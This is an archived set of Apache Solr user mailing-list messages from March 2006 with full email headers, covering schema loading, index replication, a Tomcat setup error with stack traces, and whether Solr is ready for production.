Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 67725 invoked by uid 99); 27 Mar 2006 18:46:53 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 27 Mar 2006 10:46:53 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO pproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 27 Mar 2006 10:46:52 -0800 Received: by pproxy.gmail.com with SMTP id s49so1406981pyc for <[email protected]>; Mon, 27 Mar 2006 10:46:31 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=EF7gJ3ssYi0h1pnRIQwMgIL9TsoBEwlnb4MXoUOAEb/jpeUNkDUdbhV4OmIeAVY8NHJjR/fKcdW3g1ll7rjRio+XxE36QdIEma9EZmP52FmNlQKytBb5wZdhVqBMF9ns4ezlJvTqhKnXaXmLN/HQvEcYa83MDIHq11elIza21yE= Received: by 161.129.204.104 with SMTP id r10mr1287574pyl; Mon, 27 Mar 2006 10:46:29 -0800 (PST) Received: by 161.129.204.104 with HTTP; Mon, 27 Mar 2006 10:46:29 -0800 (PST) Message-ID: <[email protected]> Date: Mon, 27 Mar 2006 13:46:29 -0500 From: "Yonik Seeley" <[email protected]> To: [email protected] Subject: Re: What is proper way to re-init index? In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline References: <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N The easiest way to verify that you are using your schema is to go to the admin page and check out the schema name... it should say "Solr Admin (trial1)" at the top of the page. You can also click on the schema link to see the contents of the schema file and verify that it's the most recent and contains the form field. -Yonik On 3/27/06, Yonik Seeley <[email protected]> wrote: > On 3/27/06, John Mohr <[email protected]> wrote: > > So why wouldn't the "form" field be recognized? > > Your schema is correct, I tried it myself and it worked. > My best guess is that Solr isn't actually reading your schema.xml, but > the example one. > Are you sure solrconf/schema.xml is your schema, and that you > restarted the server so it would be re-read? > > -Yonik > > > > -----Original Message----- > > From: Yonik Seeley [mailto:[email protected]] > > Sent: Monday, March 27, 2006 10:17 AM > > To: [email protected] > > Subject: Re: What is proper way to re-init index? > > > > > > Hi John, > > > > The error message "undefined field form" means Solr doesn't know about > > the "form" field. > > Did you copy your schema.xml to the example/solrconf directory and > > restart the app server? > > > > I tried your schema and doc, and didn't get the error you did. I got > > an error further down due to and invalid date format (see schema.xml > > comments for date type for the correct format). > > > > -Yonik > > > > (the weird stack trace showing an XML parsing error is due to Solr > > trying to continue on to the next document even though the first had > > an error... and it looks like this part of the code could use a little > > work). > > From [email protected] Mon Mar 27 18:56:31 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 16500 invoked from network); 27 Mar 2006 18:56:31 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 27 Mar 2006 18:56:31 -0000 Received: (qmail 83556 invoked by uid 500); 27 Mar 2006 18:56:31 -0000 Delivered-To: [email protected] Received: (qmail 83536 invoked by uid 500); 27 Mar 2006 18:56:31 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 83519 invoked by uid 99); 27 Mar 2006 18:56:31 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 27 Mar 2006 10:56:31 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO rwcrmhc11.comcast.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 27 Mar 2006 10:56:30 -0800 Received: from andy (c-68-52-221-224.hsd1.tn.comcast.net[161.129.204.104]) by comcast.net (rwcrmhc11) with SMTP id <20060327185609m1100c9l7he>; Mon, 27 Mar 2006 18:56:09 +0000 From: "John Mohr" <[email protected]> To: <[email protected]> Subject: RE: What is proper way to re-init index? Date: Mon, 27 Mar 2006 12:55:06 -0600 Message-ID: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.6604 (9.0.2911.0) In-Reply-To: <[email protected]> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1506 Importance: Normal X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N I was about to respond saying yes, I know it is correct, but it turns out that while I had changed the solrconf directory, I hadn't restarted Jetty that picks it up. After doing so, it worked fine. Thanks. -----Original Message----- From: Yonik Seeley [mailto:[email protected]] Sent: Monday, March 27, 2006 12:42 PM To: [email protected] Subject: Re: What is proper way to re-init index? On 3/27/06, John Mohr <[email protected]> wrote: > So why wouldn't the "form" field be recognized? Your schema is correct, I tried it myself and it worked. My best guess is that Solr isn't actually reading your schema.xml, but the example one. Are you sure solrconf/schema.xml is your schema, and that you restarted the server so it would be re-read? -Yonik > -----Original Message----- > From: Yonik Seeley [mailto:[email protected]] > Sent: Monday, March 27, 2006 10:17 AM > To: [email protected] > Subject: Re: What is proper way to re-init index? > > > Hi John, > > The error message "undefined field form" means Solr doesn't know about > the "form" field. > Did you copy your schema.xml to the example/solrconf directory and > restart the app server? > > I tried your schema and doc, and didn't get the error you did. I got > an error further down due to and invalid date format (see schema.xml > comments for date type for the correct format). > > -Yonik > > (the weird stack trace showing an XML parsing error is due to Solr > trying to continue on to the next document even though the first had > an error... and it looks like this part of the code could use a little > work). > From [email protected] Mon Mar 27 21:16:19 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 17836 invoked from network); 27 Mar 2006 21:16:19 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 27 Mar 2006 21:16:19 -0000 Received: (qmail 95066 invoked by uid 500); 27 Mar 2006 21:16:18 -0000 Delivered-To: [email protected] Received: (qmail 95006 invoked by uid 500); 27 Mar 2006 21:16:18 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 94996 invoked by uid 99); 27 Mar 2006 21:16:18 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 27 Mar 2006 13:16:18 -0800 X-ASF-Spam-Status: No, hits=2.3 required=10.0 tests=DNS_FROM_RFC_ABUSE,DNS_FROM_RFC_WHOIS,FORGED_YAHOO_RCVD,HTML_MESSAGE X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO web50006.mail.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Mon, 27 Mar 2006 13:16:17 -0800 Received: (qmail 24421 invoked by uid 60001); 27 Mar 2006 21:15:56 -0000 DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:Date:From:Reply-To:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=ooy1rSIH49EIMe5igitDZhcxsKe4BZaHnuoAH1qYWNGSssLNV0A8Myf0LU1Eil+R9fw70GH4gdGD3iDGclqjzaBquKAZeGtWBJt8Je2GJ8Jv6ltbUgFsREPF8xrBy5WFFY0rLxMt9gvw4Xzz3uO+wE41QdyYwUaF3M6FtNrktJg= ; Message-ID: <[email protected]> Date: Mon, 27 Mar 2006 13:15:56 -0800 (PST) From: jason rutherglen <[email protected]> Reply-To: jason rutherglen <[email protected]> Subject: Re: To cluster, or not to cluster... To: Clay Webster <[email protected]>, [email protected] In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="0-1038177515-1143494156=:24021" X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N --0-1038177515-1143494156=:24021 Content-Type: text/plain; charset=us-ascii Hi Clay, The question was: "Hi Jason, Would that not mean if one of the master indexes went down then a subset of data would be offline? Rob." I think if you wanted to run redundant masters (for some reason unknown at this time) this might be one solution. Possibly if you had multiple data centers. ----- Original Message ---- From: Clay Webster <[email protected]> To: [email protected]; jason rutherglen <[email protected]> Sent: Monday, March 27, 2006 8:23:30 AM Subject: Re: To cluster, or not to cluster... Jason, I'm not following why you suggesting having multiple masters (and updating multiple masters). I can see an advantage and lots of disadvantages. What is the problem you're suggesting this could address? --cw --0-1038177515-1143494156=:24021-- From [email protected] Tue Mar 28 01:57:40 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 43001 invoked from network); 28 Mar 2006 01:57:40 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Mar 2006 01:57:40 -0000 Received: (qmail 45365 invoked by uid 500); 28 Mar 2006 01:57:40 -0000 Delivered-To: [email protected] Received: (qmail 45324 invoked by uid 500); 28 Mar 2006 01:57:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 45315 invoked by uid 99); 28 Mar 2006 01:57:39 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 27 Mar 2006 17:57:39 -0800 X-ASF-Spam-Status: No, hits=2.3 required=10.0 tests=DNS_FROM_RFC_ABUSE,DNS_FROM_RFC_WHOIS,FORGED_YAHOO_RCVD,HTML_MESSAGE X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO web50008.mail.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Mon, 27 Mar 2006 17:57:38 -0800 Received: (qmail 81784 invoked by uid 60001); 28 Mar 2006 01:57:17 -0000 DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:Date:From:Reply-To:Subject:To:MIME-Version:Content-Type; b=QCsBWxLcnoC66SjPZrVcyT6jAOH3/ffLfjllfiu384GxS7Ft3yPzhnesfXRcGI1h2eZPhD8dFFUIEMqs92DDAjoFcFgSsXZtyDnWePkZ/5UNAoHcUoYi6YmxZv+nTI7EiIHw8XJZpC7gUMAxUiUWtT2Xd3peYg+DZz5ultGG0EA= ; Message-ID: <[email protected]> Date: Mon, 27 Mar 2006 17:57:17 -0800 (PST) From: jason rutherglen <[email protected]> Reply-To: jason rutherglen <[email protected]> Subject: Rsync To: [email protected] MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="0-887035308-1143511037=:64180" X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N --0-887035308-1143511037=:64180 Content-Type: text/plain; charset=us-ascii I was thinking, would it not be possible to avoid using rsync and record a list of all new segment files added (from within Lucene), and simply use HTTP to sync down the newest ones? Perhaps only using rsync after an optimize? Seems like if I understand Lucene correctly only new files are created? --0-887035308-1143511037=:64180-- From [email protected] Tue Mar 28 10:37:53 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 6658 invoked from network); 28 Mar 2006 10:37:52 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Mar 2006 10:37:52 -0000 Received: (qmail 47345 invoked by uid 500); 28 Mar 2006 10:37:52 -0000 Delivered-To: [email protected] Received: (qmail 47324 invoked by uid 500); 28 Mar 2006 10:37:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 47314 invoked by uid 99); 28 Mar 2006 10:37:52 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Mar 2006 02:37:52 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail.gmx.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Tue, 28 Mar 2006 02:37:48 -0800 Received: (qmail 30978 invoked by uid 0); 28 Mar 2006 10:37:26 -0000 Received: from 161.129.204.104 by www064.gmx.net with HTTP; Tue, 28 Mar 2006 12:37:26 +0200 (MEST) Date: Tue, 28 Mar 2006 12:37:26 +0200 (MEST) From: "Marcus Stratmann" <[email protected]> To: [email protected] MIME-Version: 1.0 Subject: Re: solr setup X-Priority: 3 (Normal) X-Authenticated: #586964 Message-ID: <[email protected]> X-Mailer: WWW-Mail 1.6 (Global Message Exchange) X-Flags: 0001 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Hi, I have a tomcat5 running under linux (debian). I think that my configuration may be wrong, because I don't get solr running. Yonik Seeley wrote: >the layout should look something like this: > >tomcat/webapps/solr.war >tomcat/solrconf/solrconfig.xml, schema.xml, etc >tomcat/bin/startup.sh > >then start tomcat by executing >./bin/startup.sh >from the tomcat directory Well, there's no bin in my tomcat5 directory. I start tomcat using "/etc/init.d/tomcat5 start". May this be a problem? This is what I've done: I compiled the source and copied solr-1.0.war to /var/lib/tomcat5/webapps/solr.war. Then I copied the solrconf dir from example to /var/lib/tomcat5/ and started tomcat. tomcat then builds a solr dir in /var/lib/tomcat5/webapps. Fine so far, but when I call http://localhost:8180/solr/admin/ for the first time, I get this: javax.servlet.ServletException org.apache.jasper.runtime.PageContextImpl.doHandlePageException(PageContextImpl.java:846) org.apache.jasper.runtime.PageContextImpl.access$11(PageContextImpl.java:784) org.apache.jasper.runtime.PageContextImpl$12.run(PageContextImpl.java:766) java.security.AccessController.doPrivileged(Native Method) org.apache.jasper.runtime.PageContextImpl.handlePageException(PageContextImpl.java:764) org.apache.jsp.admin.index_jsp._jspService(index_jsp.java:262) org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:94) javax.servlet.http.HttpServlet.service(HttpServlet.java:802) org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:324) org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:292) org.apache.jasper.servlet.JspServlet.service(JspServlet.java:236) javax.servlet.http.HttpServlet.service(HttpServlet.java:802) sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39) sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25) java.lang.reflect.Method.invoke(Method.java:585) org.apache.catalina.security.SecurityUtil$1.run(SecurityUtil.java:243) java.security.AccessController.doPrivileged(Native Method) javax.security.auth.Subject.doAsPrivileged(Subject.java:517) org.apache.catalina.security.SecurityUtil.execute(SecurityUtil.java:272) org.apache.catalina.security.SecurityUtil.doAsPrivilege(SecurityUtil.java:161) root cause java.lang.ExceptionInInitializerError org.apache.solr.core.SolrConfig.<clinit>(SolrConfig.java:33) org.apache.solr.update.SolrIndexConfig.<clinit>(SolrIndexConfig.java:34) org.apache.solr.core.SolrCore.<clinit>(SolrCore.java:71) org.apache.jsp.admin.index_jsp._jspService(index_jsp.java:67) org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:94) javax.servlet.http.HttpServlet.service(HttpServlet.java:802) org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:324) org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:292) org.apache.jasper.servlet.JspServlet.service(JspServlet.java:236) javax.servlet.http.HttpServlet.service(HttpServlet.java:802) sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39) sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25) java.lang.reflect.Method.invoke(Method.java:585) org.apache.catalina.security.SecurityUtil$1.run(SecurityUtil.java:243) java.security.AccessController.doPrivileged(Native Method) javax.security.auth.Subject.doAsPrivileged(Subject.java:517) org.apache.catalina.security.SecurityUtil.execute(SecurityUtil.java:272) org.apache.catalina.security.SecurityUtil.doAsPrivilege(SecurityUtil.java:161) Calling the page again slightly changes the "root cause" to: java.lang.NoClassDefFoundError org.apache.jsp.admin.index_jsp._jspService(index_jsp.java:67) org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:94) javax.servlet.http.HttpServlet.service(HttpServlet.java:802) org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:324) org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:292) org.apache.jasper.servlet.JspServlet.service(JspServlet.java:236) javax.servlet.http.HttpServlet.service(HttpServlet.java:802) sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39) sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25) java.lang.reflect.Method.invoke(Method.java:585) org.apache.catalina.security.SecurityUtil$1.run(SecurityUtil.java:243) java.security.AccessController.doPrivileged(Native Method) javax.security.auth.Subject.doAsPrivileged(Subject.java:517) org.apache.catalina.security.SecurityUtil.execute(SecurityUtil.java:272) org.apache.catalina.security.SecurityUtil.doAsPrivilege(SecurityUtil.java:161) Do I have to change the solr configuration in some way? Thanks, Marcus -- Bis zu 70% Ihrer Onlinekosten sparen: GMX SmartSurfer! Kostenlos downloaden: http://www.gmx.net/de/go/smartsurfer From [email protected] Tue Mar 28 11:19:55 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 26396 invoked from network); 28 Mar 2006 11:19:50 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Mar 2006 11:19:50 -0000 Received: (qmail 97987 invoked by uid 500); 28 Mar 2006 11:19:49 -0000 Delivered-To: [email protected] Received: (qmail 97927 invoked by uid 500); 28 Mar 2006 11:19:49 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 97915 invoked by uid 99); 28 Mar 2006 11:19:49 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Mar 2006 03:19:49 -0800 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_00_10,HTML_MESSAGE,RCVD_IN_BL_SPAMCOP_NET,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO pproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Mar 2006 03:19:48 -0800 Received: by pproxy.gmail.com with SMTP id d42so1720843pyd for <[email protected]>; Tue, 28 Mar 2006 03:19:28 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:mime-version:content-type; b=ntBLXB/B7F7EIgLHfv0096G2CczlYVLsfag96YJXBENxyz3nMYLNR7xxa72gXBME0Y6tGqvPUL1NPJFCwq9zV4uCBEN+inEwOsM/xHxn3HLY6KqxQ9/fJivnBdUS9HCw+vqCzjhngnPla/T1vHrz48I9qmW9CyBxJH8klig/lZg= Received: by 161.129.204.104 with SMTP id f18mr3374652qbq; Tue, 28 Mar 2006 03:19:25 -0800 (PST) Received: by 161.129.204.104 with HTTP; Tue, 28 Mar 2006 03:19:25 -0800 (PST) Message-ID: <[email protected]> Date: Tue, 28 Mar 2006 13:19:25 +0200 From: "rany keddo" <[email protected]> To: [email protected] Subject: stability MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_20454_11571533.1143544765362" X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N ------=_Part_20454_11571533.1143544765362 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline i'm currently looking into ways of integrating lucene into my web application. how near production ready is solr? will solr be the recommende= d way of integrating lucene into a web application, or am i better off writin= g my own code? thanks! ------=_Part_20454_11571533.1143544765362-- From [email protected] Tue Mar 28 14:21:38 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 33072 invoked from network); 28 Mar 2006 14:19:32 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Mar 2006 14:19:32 -0000 Received: (qmail 61671 invoked by uid 500); 28 Mar 2006 14:19:14 -0000 Delivered-To: [email protected] Received: (qmail 61647 invoked by uid 500); 28 Mar 2006 14:19:14 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 61638 invoked by uid 99); 28 Mar 2006 14:19:14 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Mar 2006 06:19:14 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO pproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Mar 2006 06:19:13 -0800 Received: by pproxy.gmail.com with SMTP id e30so252389pya for <[email protected]>; Tue, 28 Mar 2006 06:18:52 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=YZyM+Qx9hI9fKlS2yiPheTsDgCVidnUM+TU+mNvf/dd3Bq6dpWlBitCktSMCMWalZ9h+P6By2x7dQnlaJ5/l6L7qIDmYhSl9iY4/Hd2z+IvAZ+K3WhIf50BM1IlqoxNAQ2OiH2XkULnb9qZcCC8WmCvAr+Y5scCUgDAgitebYDo= Received: by 161.129.204.104 with SMTP id x17mr1879101pyk; Tue, 28 Mar 2006 06:18:52 -0800 (PST) Received: by 161.129.204.104 with HTTP; Tue, 28 Mar 2006 06:18:52 -0800 (PST) Message-ID: <[email protected]> Date: Tue, 28 Mar 2006 09:18:52 -0500 From: "Bill Au" <[email protected]> To: [email protected] Subject: Re: stability In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_18795_31362868.1143555532729" References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N ------=_Part_18795_31362868.1143555532729 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline The Solr Wiki has a list of public websites that is using Solr: http://wiki.apache.org/solr/PublicServers For these sites, Solr is already used in production. Bill On 3/28/06, rany keddo <[email protected]> wrote: > > i'm currently looking into ways of integrating lucene into my web > application. how near production ready is solr? will solr be the > recommended > way of integrating lucene into a web application, or am i better off > writing > my own code? > thanks! > > ------=_Part_18795_31362868.1143555532729-- From [email protected] Tue Mar 28 14:21:39 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 33394 invoked from network); 28 Mar 2006 14:20:16 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Mar 2006 14:20:16 -0000 Received: (qmail 62046 invoked by uid 500); 28 Mar 2006 14:19:48 -0000 Delivered-To: [email protected] Received: (qmail 61976 invoked by uid 500); 28 Mar 2006 14:19:47 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 61967 invoked by uid 99); 28 Mar 2006 14:19:47 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Mar 2006 06:19:47 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO pproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Mar 2006 06:19:47 -0800 Received: by pproxy.gmail.com with SMTP id d42so1791485pyd for <[email protected]>; Tue, 28 Mar 2006 06:19:26 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=nvFsMR3xwnuQVZeC5X45+eEZng1zJLbooltOowzj1p0gjRDyK1S+Hqp1WP50EqUtKQvCbgihBwrFSwymdMOPKJnmMIdKcIb3wwSlZ1AxqE0B1Nr6S4LgvpFohLzbMInV7XafNk4Y9Wj2Zr6VAXQNkwnta+Wzd65+S2eRWu2fG4g= Received: by 161.129.204.104 with SMTP id f18mr3497268qbq; Tue, 28 Mar 2006 06:19:26 -0800 (PST) Received: by 161.129.204.104 with HTTP; Tue, 28 Mar 2006 06:19:26 -0800 (PST) Message-ID: <[email protected]> Date: Tue, 28 Mar 2006 08:19:26 -0600 From: "Mike Austin" <[email protected]> To: [email protected] Subject: Re: solr setup In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_16520_335938.1143555566432" References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N ------=_Part_16520_335938.1143555566432 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline Try starting Tomcat from your /var/lib/tomcat5/ folder. While in that folder, run "/etc/init.d/tomcat5 start". I think I had a similar issue and it was because I started tomcat in the wrong folder. mike ------=_Part_16520_335938.1143555566432-- From [email protected] Tue Mar 28 14:32:54 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 43391 invoked from network); 28 Mar 2006 14:32:54 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Mar 2006 14:32:54 -0000 Received: (qmail 92314 invoked by uid 500); 28 Mar 2006 14:32:54 -0000 Delivered-To: [email protected] Received: (qmail 92299 invoked by uid 500); 28 Mar 2006 14:32:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 92290 invoked by uid 99); 28 Mar 2006 14:32:53 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Mar 2006 06:32:53 -0800 X-ASF-Spam-Status: No, hits=1.3 required=10.0 tests=RCVD_IN_BL_SPAMCOP_NET,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO pproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Mar 2006 06:32:52 -0800 Received: by pproxy.gmail.com with SMTP id e30so259769pya for <[email protected]>; Tue, 28 Mar 2006 06:32:32 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; 